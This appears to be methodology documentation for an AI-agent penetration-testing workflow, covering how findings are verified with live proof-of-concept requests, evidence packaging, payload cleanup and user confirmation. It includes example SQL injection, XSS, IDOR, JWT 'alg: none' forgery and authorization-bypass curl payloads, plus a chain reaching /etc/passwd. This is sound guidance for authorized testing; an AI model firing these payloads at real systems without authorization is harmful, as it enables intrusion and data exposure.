# Phase 5: Verification & PoC Validation

## Overview
Phase 5 ensures every reported vulnerability has a working, reproducible exploit and an evidence package strong enough to survive peer review, client delivery, and bug bounty triage. Findings without working exploits are rejected and not included in the final report.
Purpose: Eliminate false positives and confirm that every reported vulnerability is real and exploitable.
## The Verification Principle

**CRITICAL RULE:** No exploit = no report. No real evidence = no report.
Every finding created in Phase 4 must be verified:

1. Test the exact exploit steps on the live target
2. Confirm the vulnerability is real (not a false positive)
3. Ask for user confirmation before final inclusion
4. If the exploit fails → reject the finding

For pentests, verification is not complete until the finding includes the full raw HTTP request and the full raw HTTP response, with complete headers and body, plus representative screenshots whenever the strongest proof is visual or browser-driven. For bug bounty findings, keep the PoC as fast as possible (preferably curl) and record a video of the working PoC.
This approach ensures 100% finding accuracy and credibility with the client.
## Verification Flow

```mermaid
graph TB
    A["Phase 4 Complete<br/>N findings in findings/"] --> B["Categorize Findings<br/>Count by severity"]
    B --> C{"Findings < 6?"}
    C -->|Yes| D["Sequential Verify<br/>1 agent"]
    C -->|No| E["Parallel Verify<br/>3 batches, 3 agents"]
    D --> F["Build PoC<br/>curl command"]
    E --> F
    F --> G["Run Exploit<br/>Live target"]
    G --> H{Exploit Works?}
    H -->|Yes| I["Record Evidence<br/>Response, screenshot"]
    H -->|No| J["Reject Finding<br/>Log false positive"]
    I --> K["Cleanup<br/>Remove payloads"]
    K --> L["User Confirmation<br/>Include in report?"]
    J --> M["Phase 5 Complete<br/>Verified findings ready"]
    L --> M
    style A fill:#4a148c,color:#fff
    style M fill:#4a148c,color:#fff
    style I fill:#ab47bc,color:#fff
    style K fill:#ab47bc,color:#fff
```
## Borderline Second Opinion
Verification now includes a compact Codex second-opinion path for borderline findings.
This path is used when:
- evidence is real but not yet decisive
- the exploit behaves inconsistently
- Claude can reproduce some signal but not enough for a clean verdict
- the likely issue is high-value enough that a bounded second opinion is justified
### Decision Split

| Step | Engine | Responsibility |
|---|---|---|
| Live exploit attempt | Claude | Run the PoC against the target |
| Borderline review | Codex `finding_verifier` | Evaluate the compact evidence bundle |
| Final verdict | Claude | Decide promote, retest, or reject |
Codex does not replace live verification. It challenges assumptions and suggests whether the current evidence supports:
- promotion to verified finding
- downgrade to weak signal
- one more targeted retest
- full rejection as likely false positive
### Compact Advisory Input
The borderline review is intentionally small and structured. It includes:
- target surface
- current hypothesis
- concise attempt summary
- evidence bundle
- constraints
This keeps Codex focused on the finding itself instead of the full engagement transcript.
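A compact advisory input might look like the following sketch. The field names and values here are illustrative, not a fixed schema:

```json
{
  "target_surface": "POST /api/v1/reports/export",
  "hypothesis": "filename parameter allows path traversal (LFI)",
  "attempt_summary": "3 attempts; ../ payloads return 500, absolute paths return 200 with empty body",
  "evidence_bundle": [
    "request/response pair for traversal payload (HTTP 500)",
    "request/response pair for absolute path (HTTP 200, empty body)"
  ],
  "constraints": "no destructive payloads; max 5 more requests"
}
```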
### Expected Outcome
The intended result is fewer false positives and fewer wasted Claude tokens on repeated self-checks of the same ambiguous case.
## How Findings Are Verified

### 1. SQLi Verification

**Safe verification technique:** Use `SLEEP()` or `BENCHMARK()` to confirm time-based SQLi without extracting data
```bash
# Original vulnerable parameter (payload URL-encoded so curl accepts it)
curl "https://api.example.com/api/v1/users?sort=name'%20OR%20'1'='1"

# Verification: time-based
curl -w "Total time: %{time_total}s\n" \
  "https://api.example.com/api/v1/users?sort=name'%20AND%20SLEEP(5)%20--%20-"
# Expected: response takes 5+ seconds
```
Acceptable evidence:
- ✅ Time delay in response (SLEEP confirms query execution)
- ✅ SELECT statement in error message (confirms SQL context)
- ✅ Different output with OR 1=1 (confirms injection)
- ❌ Just "error message" without confirming SQL injection
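The timing check above can be reduced to a small decision rule. A minimal sketch, assuming response times were measured with `curl -w '%{time_total}'`; the helper name and the 80% threshold are illustrative:

```shell
# Hypothetical helper: decide whether an injected SLEEP(n) confirms
# time-based SQLi. Arguments: baseline seconds, injected seconds, SLEEP seconds.
sqli_time_verdict() {
  # Confirm only when the extra delay is at least 80% of the injected SLEEP,
  # so ordinary network jitter does not produce a false confirmation.
  awk -v b="$1" -v i="$2" -v s="$3" 'BEGIN {
    if (i - b >= 0.8 * s) print "time-based SQLi likely"
    else print "inconclusive"
  }'
}

sqli_time_verdict 0.31 5.42 5   # e.g. measurements from curl -w "%{time_total}"
# → time-based SQLi likely
```

Repeating the measurement a few times before promoting the finding guards against a one-off slow response.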
### 2. XSS Verification

**Reflected XSS:** Inject `alert(document.domain)` and verify JavaScript execution

```bash
# Test reflected XSS (payload URL-encoded) and save the response
curl -s "https://api.example.com/search?q=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E" \
  -o response.html

# Verify the response contains the unescaped payload
grep -q "<script>alert(document.domain)</script>" response.html
```
**Stored XSS:** POST payload → GET to verify persistence

```bash
# Step 1: Store payload
curl -X POST "https://api.example.com/comments" \
  -d "text=<img src=x onerror=alert(1)>"

# Step 2: Verify persistence (save the response, then check it)
curl -s "https://api.example.com/comments/123" -o response.html
grep -q "onerror=alert" response.html
```
**DOM XSS:** Use Playwright MCP or a browser extension to verify:

- Inspect DOM for payload
- Check console for errors
- Visual confirmation of JavaScript execution
### 3. IDOR Verification

**Technique:** Enumerate user IDs and verify access to another user's data

```bash
# Authenticated as User A (ID 1)
curl -H "Authorization: Bearer TOKEN_USER_A" \
  "https://api.example.com/api/v1/users/2/profile"
# If User A can read User B's profile (ID 2), it's IDOR
```
Evidence:

- ✅ Retrieved another user's PII (name, email, phone)
- ✅ Modified another user's data
- ✅ Deleted another user's resource
- ❌ Got a 200 response (but the endpoint doesn't return sensitive data)
### 4. Broken Authentication Verification

**JWT Algorithm Confusion:**

```bash
# Original token
ORIGINAL_TOKEN="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."

# Craft token with alg: "none"
NONE_TOKEN="eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.payload."

# Verify it's accepted
curl -H "Authorization: Bearer $NONE_TOKEN" \
  "https://api.example.com/api/v1/admin"
# If 200 response (not 401), authentication is broken
```
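The unsigned token can be built from scratch rather than hand-edited. A sketch assuming `openssl` is available; the claims in the payload are illustrative:

```shell
# Base64url-encode stdin: standard base64, then swap +/ for -_ and strip padding
b64url() { openssl base64 -A | tr '+/' '-_' | tr -d '='; }

header=$(printf '%s' '{"alg":"none","typ":"JWT"}' | b64url)
payload=$(printf '%s' '{"sub":"1","role":"admin"}' | b64url)   # illustrative claims

# Unsigned token: header.payload. (trailing dot, empty signature)
NONE_TOKEN="${header}.${payload}."
echo "$NONE_TOKEN"
```

If the target accepts this token, also capture the privileged response it unlocks; the crafted token alone is not impact.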
### 5. Authorization Bypass Verification

**Test:** Low-privilege user accessing high-privilege functions

```bash
# Authenticate as "User" role (lowest privilege)
curl -H "Authorization: Bearer USER_TOKEN" \
  "https://api.example.com/api/v1/admin/users/delete?id=999"
# If 200/204 (user deleted), authz is bypassed
# If 403 (forbidden), authz is enforced
```
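When triaging many such requests, the status-code interpretation above can be captured in a tiny helper. This is a sketch; the verdict strings are arbitrary:

```shell
# Map the HTTP status of a privilege-escalation attempt to a triage verdict
authz_verdict() {
  case "$1" in
    200|204) echo "BYPASS CONFIRMED: verify response body, then record evidence" ;;
    401|403) echo "enforced: likely false positive" ;;
    *)       echo "inconclusive (HTTP $1): retest or inspect manually" ;;
  esac
}

authz_verdict 403
# → enforced: likely false positive
```

A 200 alone is never sufficient: the response body must show the privileged action actually succeeded.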
## Evidence Collection

For each verified finding, collect:

### 1. Full HTTP Request (Pentest Standard)

```http
POST /api/v1/users HTTP/1.1
Host: api.example.com
Authorization: Bearer eyJhbG...
Content-Type: application/json

{"email":"test' OR '1'='1","role":"admin"}
```
### 2. Full HTTP Response (Pentest Standard)

```http
HTTP/1.1 200 OK
Content-Type: application/json
X-Request-Id: 8f3a1b2c

{"users":[{"id":1,"email":"admin@example.com","role":"admin"},...]}
```
Store the complete response by default. Do not truncate headers or body unless you are performing minimal redaction of secrets or non-essential sensitive data.
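Minimal redaction can be automated so that only the secret value is replaced and the rest of the transcript stays byte-for-byte intact. A sketch using `sed`; the helper name and transcript line are illustrative:

```shell
# Replace bearer-token values with a marker, leaving all other evidence intact
redact_bearer() {
  sed -E 's/(Authorization: Bearer )[A-Za-z0-9._-]+/\1[REDACTED]/'
}

printf 'Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.abc.def\n' | redact_bearer
# → Authorization: Bearer [REDACTED]
```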
### 3. Response Indicator (What proves the vuln)

### 4. Baseline (What the response should be)
### 5. Representative Screenshot (When Relevant)

Capture a screenshot whenever the strongest proof is visual or browser-driven, for example:

- XSS or stored XSS dialog / rendered payload
- Authorization bypass visible in UI
- Sensitive data exposure rendered in page context
- Stored payload appearing for another role or another user
Screenshots must be representative, not decorative. A screenshot does not replace the raw HTTP evidence; it complements it.
### 6. Bug Bounty Only: Working-PoC Video
For bug bounty findings, record a video that shows:
- the real target
- the exact steps or the rapid curl PoC
- the exploit succeeding live
- the visible or observable impact
Bug bounty submissions without a working-PoC video are not submission-ready.
All collected in `FINDING-NNN.md`:

```markdown
HTTP Response:
Response Indicator: Response contains admin users when accessed as regular user
Baseline: Should return 403 Forbidden or empty user list for non-admin users
```
For pentests, this exact evidence package must propagate into HedgeDoc/Outline notes and the generated `.docx` report. The report is not allowed to downgrade full HTTP evidence into prose-only summaries.
## Parallel Verification (6+ Findings)
When there are 6 or more findings, verify in parallel to save time:
```bash
# Batch 1 (agents 1-2): SQLi, XSS findings
# Batch 2 (agents 3-4): IDOR, Auth findings
# Batch 3 (agents 5-6): Logic, Infrastructure findings
# Run in parallel
claude -p < batch1.prompt > batch1-results.log &
claude -p < batch2.prompt > batch2-results.log &
claude -p < batch3.prompt > batch3-results.log &
wait
```

Batches are consolidated after all complete.
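The background-job pattern above can be hardened slightly by collecting each batch's exit status, so a failed batch is noticed before consolidation. A sketch with placeholder workers (`sleep` stands in for a real `claude -p` run):

```shell
tmp=$(mktemp -d)

run_batch() { sleep 0.1; echo "batch $1 done"; }   # placeholder worker

run_batch 1 > "$tmp/batch1-results.log" &
pid1=$!
run_batch 2 > "$tmp/batch2-results.log" &
pid2=$!
run_batch 3 > "$tmp/batch3-results.log" &
pid3=$!

# wait on each PID individually so any non-zero exit is detected
status=0
for pid in "$pid1" "$pid2" "$pid3"; do
  wait "$pid" || status=1
done
echo "all batches complete (status=$status)"
```

A plain `wait` with no arguments also blocks until all jobs finish, but it discards the individual exit statuses.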
## Payload Cleanup (CRITICAL)
After evidence collection, ALL persistent payloads must be removed from the target:
### Stored XSS Cleanup

```bash
# Payload was: <img src=x onerror=alert(1)>
curl -X PUT "https://api.example.com/comments/123" \
  -d "text=Cleaned up payload"

# Verify removal: grep exits non-zero when the payload is gone
if curl -s "https://api.example.com/comments/123" | grep -q "alert(1)"; then
  echo "payload still present"
else
  echo "payload removed"
fi
```
Applies to:

- Stored XSS in comments, profiles, messages
- Stored SSTI in templates
- Stored CRLF in headers
- Uploaded files (delete after screenshot)
### Finding Record

```json
{
  "finding_id": "FINDING-001",
  "cleanup_status": "cleaned",
  "cleanup_evidence": {
    "timestamp": "2026-03-13T14:35:00Z",
    "verified_removed": true
  }
}
```
## User Confirmation Workflow

Before final inclusion in the report, ask the user for each finding:

```
Found: SQL Injection in /api/v1/users?sort=
Severity: HIGH
PoC: curl "https://api.example.com/api/v1/users?sort=name' AND SLEEP(5)"
Expected: Response delays 5+ seconds
Actual: Response delayed 5.2 seconds ✓

Include in report? (yes/no)
```
User can:

- ✅ yes: Include in report
- ❌ no: Exclude (e.g., "client wants to test this themselves")
- 🔍 re-verify: Run exploit again
- 📝 adjust: Change severity/description
## Verification Failure Handling

If the exploit fails:

```
Finding: IDOR on /api/v1/users/{id}
Expected: Can access user 999 as user 1
Attempted: curl -H "Authorization: Bearer TOKEN_1" "https://api.example.com/api/v1/users/999"
Result: HTTP 403 Forbidden (Access Denied)

Conclusion: User correctly denied access → NOT VULNERABLE (False Positive)
Action: Remove from report
```
## Common False Positives

| Scenario | Issue | Solution |
|---|---|---|
| IDOR on /users/{id} returns 403 | Access control is working | False positive → remove |
| SQLi detected but returns same data | Query doesn't change results | Verify with time-based SQLi |
| XSS payload in response but HTML-escaped | Escaping prevents execution | False positive → remove |
| Auth bypass attempt rejected | Authorization properly enforced | False positive → remove |
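The HTML-escaped XSS case can be checked mechanically. A sketch that classifies a saved response body; the helper name, payload, and verdict strings are illustrative:

```shell
# Classify how the test payload came back in the response body
reflection_verdict() {
  body="$1"
  if printf '%s' "$body" | grep -q '<script>alert(document.domain)</script>'; then
    echo "unescaped reflection: likely XSS"
  elif printf '%s' "$body" | grep -q '&lt;script&gt;'; then
    echo "escaped: false positive"
  else
    echo "payload not reflected"
  fi
}

reflection_verdict '<p>You searched for &lt;script&gt;alert(document.domain)&lt;/script&gt;</p>'
# → escaped: false positive
```

An unescaped reflection still needs browser confirmation before promotion, since a CSP or sink context can block execution.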
## Chain Detection

After verifying individual findings, `/chain-findings` correlates them into attack chains:

```
Example Chain:
├── Finding: SQLi on /api/v1/reports?sort=
├── Finding: LFI on /api/v1/reports/export?filename=
└── Chain: SQLi → extract admin email → LFI via filename injection → read /etc/passwd
```

Each chain gets a `CHAIN-NNN.md` file with execution steps.
## Verification Statistics

After Phase 5:

- Verified findings: X (with working exploits)
- Rejected findings: Y (false positives)
- Cleanup status: All persistent payloads removed
- User confirmations: X/X (all approved)
## Next Phase
After Phase 5 completes with all findings verified and cleaned up, proceed to Phase 6: Report to generate the professional penetration test report.